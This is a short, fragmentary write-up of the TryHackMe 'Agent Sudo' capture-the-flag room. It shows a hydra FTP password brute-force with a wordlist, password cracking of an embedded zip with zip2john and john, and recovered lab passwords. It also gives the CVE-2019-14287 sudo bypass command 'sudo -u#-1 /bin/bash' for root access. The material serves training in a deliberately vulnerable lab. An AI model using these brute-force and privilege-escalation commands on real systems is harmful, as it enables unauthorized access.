【THM】Agent Sudo-Practice

TryHackMe room for this write-up: https://tryhackme.com/room/agentsudoctf

Difficulty: Easy

Welcome to another THM exclusive CTF room. Your task is simple, capture the flags just like the other CTF room. Have Fun!

Task 2 Enumerate


Visit port 80


Change the User-Agent header directly with HackBar

At first I used R


Later, trial and error turned up C


Task 3 Hash cracking and brute-force

Done enumerate the machine? Time to brute your way out.

FTP password

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.21.54/


Got the password: crystal

mget *
# download all files


exiftool cutie.png


It mentions a warning: Trailer data after PNG IEND chunk

Let’s dump the file to hex format by using xxd.

xxd cutie.png


binwalk -e cutie.png --run-as=root


We can use the zip2john tool to convert the zip to a format suitable for john.

zip2john 8702.zip > hash.txt

john hash.txt


Or on the command line:

7z e 8702.zip


Area51


hackerrules!

Task 4 Capture the user flag


Exit the SSH service, and copy the jpg file from the SSH service to your system with the following command:

sudo scp james@10.10.21.54:Alien_autospy.jpg ~/

What is the incident of the photo called?

Search with Google

Roswell alien autopsy

Task 5 Privilege escalation

Enough with the extraordinary stuff? Time to get real.

Log back in to the SSH service


Checking out james’ privileges

(ALL, !root) /bin/bash

Search online

https://www.exploit-db.com/exploits/47502

CVE : 2019-14287

This has the following CVE number: CVE-2019-14287. It allows us to get root access by running:

sudo -u#-1 /bin/bash


(Bonus) Who is Agent R?

DesKel